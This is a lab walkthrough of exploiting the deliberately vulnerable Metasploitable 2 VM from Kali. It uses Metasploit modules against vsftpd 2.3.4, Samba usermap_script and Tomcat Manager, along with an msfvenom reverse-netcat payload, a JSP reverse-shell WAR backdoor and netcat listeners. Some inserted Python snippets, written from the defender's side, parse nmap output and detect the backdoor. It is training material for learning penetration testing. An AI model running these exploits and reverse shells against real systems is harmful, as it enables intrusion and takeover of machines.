The Metasploitable 2 virtual machine can be described as a practice target built for people who want to learn penetration testing. The VM contains many vulnerabilities, and exploits have been developed for all of them.
It can be downloaded from this link. The downloaded VM can be run in VMware and VirtualBox. In short, with one Kali and one Metasploitable 2 you can set up your own attacker and victim machines.
I won't cover how to run it in VMware or VirtualBox here; Google will help you with that.
Note: the Metasploitable machine's username and password: msfadmin/msfadmin
The Kali machine's username and password (if you downloaded the OVA file): root / toor
Reconnaissance Phase
Active IP addresses can be identified by scanning with tools such as Nmap or netdiscover.
We'll proceed with nmap here. Since I know the Metasploitable machine's IP address, I'm scanning a single IP. (You can also scan the whole block by entering 192.168.1.0/24.)
root@kali:~# nmap -sV -A -v 192.168.1.21
NSE: Script scanning 192.168.1.21.
Initiating NSE at 14:14
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 14:14, 9.40s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 14.30s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 0.01s elapsed
Nmap scan report for 192.168.1.21
Host is up (0.00085s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.26
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-10-31T18:14:20+00:00; -3s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open shell Netkit rshd
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: SupportsCompression, Support41Auth, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions
| Status: Autocommit
|_ Salt: KVNd-P+'}fgRC80'q'jc
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2019-10-31T18:14:20+00:00; -2s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:B5:3E:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.002 days (since Thu Oct 31 14:12:08 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 192.168.1.21
NSE: Script Post-scanning.
Initiating NSE at 14:14
Completed NSE at 14:14, 0.00s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 0.00s elapsed
Initiating NSE at 14:14
Completed NSE at 14:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.25 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
root@kali:~#
When the Nmap scan completes we get output listing the open ports and information about the services running on them. The following command can be used to get a more concise output.
nmap -n -sV --open -p 0-65535 192.168.1.21
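Added here as an example of what a defender does with this output (not code from the original post): a small parser for nmap's normal output that attaches NSE script lines to their port and flags the services the scan above exposes. The excerpt, the cleartext-service list and the banner watch-list are constructed for this example.

```python
"""Triage nmap -sV normal output: attach NSE script lines to their port and
flag the services a defender would want to remediate first."""
import re

# Constructed excerpt of the scan output shown above; not the full scan.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| sslv2:
| SSLv2 supported
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Services whose protocol carries credentials or commands in cleartext.
CLEARTEXT_SERVICES = {"ftp", "telnet", "exec", "login", "shell"}
# Banners the post shows being exploited; a constructed watch-list, not a CVE feed.
BANNER_WATCHLIST = {"vsftpd 2.3.4": "release known to carry a backdoor"}


def parse_nmap(text):
    """Return a list of {port, proto, state, service, version, notes} dicts.
    NSE output lines ('|' prefixed) are attached to the port line above them."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            entries.append({"port": int(port), "proto": proto, "state": state,
                            "service": service, "version": version, "notes": []})
        elif line.startswith("|") and entries:
            entries[-1]["notes"].append(line.lstrip("|_ ").strip())
    return entries


def triage(entries):
    """Map port -> list of reasons it needs attention; empty dict means nothing flagged."""
    findings = {}
    for e in entries:
        reasons = []
        if e["service"] in CLEARTEXT_SERVICES:
            reasons.append("cleartext protocol: %s" % e["service"])
        notes = " ".join(e["notes"])
        if "Anonymous FTP login allowed" in notes:
            reasons.append("anonymous FTP login enabled")
        if "SSLv2 supported" in notes:
            reasons.append("SSLv2 still negotiated")
        if "bindshell" in e["service"] or "root shell" in e["version"]:
            reasons.append("unauthenticated shell service exposed")
        for banner, why in BANNER_WATCHLIST.items():
            if banner in e["version"]:
                reasons.append(why)
        if reasons:
            findings[e["port"]] = reasons
    return findings


if __name__ == "__main__":
    for port, reasons in sorted(triage(parse_nmap(SAMPLE_NMAP)).items()):
        print(port, "; ".join(reasons))
```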
Now that we've completed the port scan, let's try to exploit the vulnerabilities one by one.
We see that the FTP port is open and running vsftpd 2.3.4. So let's make our first move on FTP.
We could use Google to find out whether there is a known vulnerability and a published exploit for vsftpd 2.3.4. But before any Google search I'll open msfconsole and run a search there.
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
=[ metasploit v5.0.53-dev ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 331 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 >
msf5 > search vsftpd
Matching Modules
================
#  Name  Disclosure Date  Rank  Check  Description
-  ----  ---------------  ----  -----  -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
msf5 >
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Exploit target:
Id  Name
--  ----
0 Automatic
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.21:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.21:21 - USER: 331 Please specify the password.
[+] 192.168.1.21:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.21:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.26:46385 -> 192.168.1.21:6200) at 2019-10-31 14:50:57 -0400
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
sh-3.2# whoami
whoami
root
sh-3.2# uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
sh-3.2#
After gaining access, the whoami command shows that we are on the system with root privileges. You can switch to a bash console as follows.
sh-3.2# bash -i
bash -i
root@metasploitable:/#
For this example the vulnerability can also be exploited with Python scripts found through a Google search.
For reference, the following scripts may be useful.
https://www.exploit-db.com/exploits/17491
https://raw.githubusercontent.com/In2econd/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py
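From the detection side, added here and not part of the original post: the Metasploit session above shows what the backdoor looks like on the wire (an FTP connection followed by 192.168.1.26:46385 -> 192.168.1.21:6200) and on the host (a new listener on tcp/6200). The connection records and the `ss -ltn` output below are constructed.

```python
"""Detect the vsftpd 2.3.4 backdoor from the artefacts the session above left
behind: on the wire, an FTP connection followed shortly by a connection from
the same client to tcp/6200 on the same host; on the host, a new tcp/6200 listener."""

BACKDOOR_PORT = 6200
WINDOW_SECONDS = 60.0

# Constructed connection records (ts, src, dst, dport), modelled on the
# Metasploit session above (192.168.1.26 -> 192.168.1.21). Not a real sensor feed.
SAMPLE_CONNS = [
    (100.0, "192.168.1.26", "192.168.1.21", 21),
    (107.2, "192.168.1.26", "192.168.1.21", 6200),   # shell connection after the FTP session
    (200.0, "192.168.1.30", "192.168.1.21", 21),     # ordinary FTP client, nothing follows
    (260.0, "192.168.1.30", "192.168.1.21", 80),
    (900.0, "192.168.1.40", "192.168.1.21", 6200),   # 6200 with no FTP session first
    (1000.0, "192.168.1.26", "192.168.1.21", 6200),  # far outside the window
]

# Constructed `ss -ltn` output from the target after and before the backdoor was triggered.
SAMPLE_SS_AFTER = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       32      0.0.0.0:21          0.0.0.0:*
LISTEN  0       5       0.0.0.0:6200        0.0.0.0:*
"""
SAMPLE_SS_BEFORE = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       32      0.0.0.0:21          0.0.0.0:*
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
"""


def find_backdoor_sessions(conns, window=WINDOW_SECONDS):
    """Return (src, dst, ftp_ts, shell_ts) for every tcp/6200 connection that
    follows an FTP connection from the same src to the same dst within `window`."""
    last_ftp = {}  # (src, dst) -> timestamp of the most recent FTP connection
    hits = []
    for ts, src, dst, dport in sorted(conns):
        key = (src, dst)
        if dport == 21:
            last_ftp[key] = ts
        elif dport == BACKDOOR_PORT and key in last_ftp:
            if 0.0 <= ts - last_ftp[key] <= window:
                hits.append((src, dst, last_ftp[key], ts))
    return hits


def listening_ports(ss_output):
    """Parse `ss -ltn` output into the set of local TCP ports in LISTEN state."""
    ports = set()
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) >= 4 and cols[0] == "LISTEN":
            ports.add(int(cols[3].rsplit(":", 1)[1]))
    return ports


def backdoor_listener_present(ss_output):
    """True when the host shows the tcp/6200 listener the spawned backdoor opens."""
    return BACKDOOR_PORT in listening_ports(ss_output)


if __name__ == "__main__":
    for src, dst, ftp_ts, shell_ts in find_backdoor_sessions(SAMPLE_CONNS):
        print("suspect backdoor use: %s -> %s (ftp at %.1f, shell at %.1f)"
              % (src, dst, ftp_ts, shell_ts))
    print("listener on %d:" % BACKDOOR_PORT, backdoor_listener_present(SAMPLE_SS_AFTER))
```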
Now let's target port 139 and try to take over the target machine through Samba.
msf5 > search samba smbd
Matching Modules
================
#  Name  Disclosure Date  Rank  Check  Description
-  ----  ---------------  ----  -----  -----------
0 auxiliary/admin/smb/check_dir_file normal Yes SMB Scanner Check File/Directory Utility
1 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
2 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
3 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
4 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
5 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules
6 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
7 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
8 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
9 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
10 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
11 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
12 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
13 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
14 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
15 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
16 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
17 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
18 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
19 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
20 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
21 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
22 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
23 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
24 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
25 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
26 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
27 post/linux/gather/enum_configs normal No Linux Gather Configurations
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Exploit target:
Id  Name
--  ----
0 Automatic
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.1.26:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qWgXFlEMnytAxl18;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qWgXFlEMnytAxl18\r\n"
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.1.26:4444 -> 192.168.1.21:33703) at 2019-10-31 15:02:21 -0400
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
whoami
whoami
root
sh-3.2# bash -i
bash -i
root@metasploitable:/# uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:/#
We've now also exploited the Samba vulnerability on port 139. This time let's continue by also applying the method mentioned earlier.
I run a Google search like the one below.
samba smbd 3.x - 4.x exploit github
I open https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851 and download the exploit.py file. When I try to run it with Python, I get a usage message telling me how to use it.
root@kali:~# python exploit.py
Usage: exploit.py <HOST>
Now we use msfvenom to rewrite the payload section inside the exploit so that we get a bind shell for ourselves.
root@kali:~# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.26 LPORT=6666 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 94 bytes
Final size of python file: 475 bytes
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x65"
buf += b"\x65\x64\x64\x74\x3b\x20\x6e\x63\x20\x31\x39\x32\x2e"
buf += b"\x31\x36\x38\x2e\x31\x2e\x32\x36\x20\x36\x36\x36\x36"
buf += b"\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x65\x65\x64\x64\x74"
buf += b"\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f"
buf += b"\x74\x6d\x70\x2f\x65\x65\x64\x64\x74\x20\x32\x3e\x26"
buf += b"\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x65\x65"
buf += b"\x64\x64\x74"
root@kali:~#
We replace the corresponding section inside our exploit with the output obtained here, as you see below.
Before running the exploit, we start listening with netcat on the port we specified in the payload generated with msfvenom.
root@kali:~# nc -nvlp 6666
listening on [any] 6666 ...
Now we can run the exploit.py file.
root@kali:~# python exploit.py 192.168.1.21
Now let's switch to the terminal where we are listening with netcat.
root@kali:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.26] from (UNKNOWN) [192.168.1.21] 52985
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
bash -i
bash: no job control in this shell
root@metasploitable:/#
And with the Python script too, we've succeeded in exploiting the Samba vulnerability on the Metasploitable machine.
This time let's continue with one of the web ports. In our scan we saw Apache Tomcat/Coyote JSP engine 1.1 running on port 8180. Let's gather a bit more information based on that.
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
This time let's begin the information gathering phase with a search.
msf5 > search apache tomcat
Matching Modules
================
#  Name  Disclosure Date  Rank  Check  Description
-  ----  ---------------  ----  -----  -----------
0 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control
1 auxiliary/admin/http/tomcat_administration normal Yes Tomcat Administration Tool Default Access
2 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Yes Tomcat UTF-8 Directory Traversal Vulnerability
3 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal Yes TrendMicro Data Loss Prevention 5.5 Directory Traversal
4 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
5 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
6 auxiliary/dos/http/apache_range_dos 2011-08-19 normal Yes Apache Range Header DoS (Apache Killer)
7 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
8 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions
9 auxiliary/fileformat/odt_badodt 2018-05-01 normal No LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
10 auxiliary/gather/apache_rave_creds normal No Apache Rave User Information Disclosure
11 auxiliary/gather/impersonate_ssl normal No HTTP SSL Certificate Impersonation
12 auxiliary/scanner/couchdb/couchdb_enum normal Yes CouchDB Enum Utility
13 auxiliary/scanner/http/apache_activemq_source_disclosure normal Yes Apache ActiveMQ JSP Files Source Disclosure
14 auxiliary/scanner/http/apache_activemq_traversal normal Yes Apache ActiveMQ Directory Traversal
15 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
16 auxiliary/scanner/http/apache_optionsbleed 2017-09-18 normal Yes Apache Optionsbleed Scanner
17 auxiliary/scanner/http/apache_userdir_enum normal Yes Apache "mod_userdir" User Enumeration
18 auxiliary/scanner/http/axis_local_file_include normal Yes Apache Axis2 v1.4.1 Local File Inclusion
19 auxiliary/scanner/http/axis_login normal Yes Apache Axis2 Brute Force Utility
20 auxiliary/scanner/http/mod_negotiation_brute normal Yes Apache HTTPD mod_negotiation Filename Bruter
21 auxiliary/scanner/http/mod_negotiation_scanner normal Yes Apache HTTPD mod_negotiation Scanner
22 auxiliary/scanner/http/rewrite_proxy_bypass normal Yes Apache Reverse Proxy Bypass Vulnerability Scanner
23 auxiliary/scanner/http/tomcat_enum normal Yes Apache Tomcat User Enumeration
24 auxiliary/scanner/http/tomcat_mgr_login normal Yes Tomcat Application Manager Login Utility
25 auxiliary/scanner/http/wangkongbao_traversal normal Yes WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal
26 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal Yes Apache Karaf Default Credentials Command Execution
27 auxiliary/scanner/ssh/karaf_login normal Yes Apache Karaf Login Utility
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
And after configuring all the settings, we run the exploit command.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
[-] 192.168.1.21:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.1.21:8180 - Login Successful: tomcat:tomcat
[-] 192.168.1.21:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.1.21:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
We see that we can log in with tomcat / tomcat as the username and password.
We continue using the information obtained from the search results a moment ago.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.1.21
RHOSTS => 192.168.1.21
msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8180
RPORT => 8180
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
httppassword => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.26:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 3jgtKzPZ0...
[*] Executing 3jgtKzPZ0...
[*] Undeploying 3jgtKzPZ0 ...
[*] Sending stage (53906 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.21:42558) at 2019-10-31 15:46:09 -0400
meterpreter > shell
Process 1 created.
Channel 1 created.
bash -i
bash: no job control in this shell
tomcat55@metasploitable:/$
Let's create a backdoor for ourselves.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=6666 -f war > c3shell.war
After opening 192.168.1.21:8180 in the browser, we click Tomcat Manager on the page that appears.
We already found the username and password a moment ago.
In the "WAR file to deploy" section we click Browse, select the c3shell.war file we just created with msfvenom, and press the Deploy button.
Again we start listening with netcat in the terminal.
root@kali:~# nc -nvlp 6666
listening on [any] 6666 ...
When we try to open the page we deployed from the browser, we see that we got a shell.
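Added as a defender's check, not from the original post: the Tomcat Manager login succeeded because the account in tomcat-users.xml still carries default credentials and manager roles. The tomcat-users.xml below is constructed in the Tomcat 5.5 layout (role names "manager"/"admin"), and the DEFAULT_CREDS set is taken from pairs the login scanner tried above plus the obvious self-named ones.

```python
"""Audit tomcat-users.xml for the weakness the Manager login above exposed:
accounts holding manager/admin roles with default or weak credentials."""
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml in the Tomcat 5.5 layout; not the file from the VM.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
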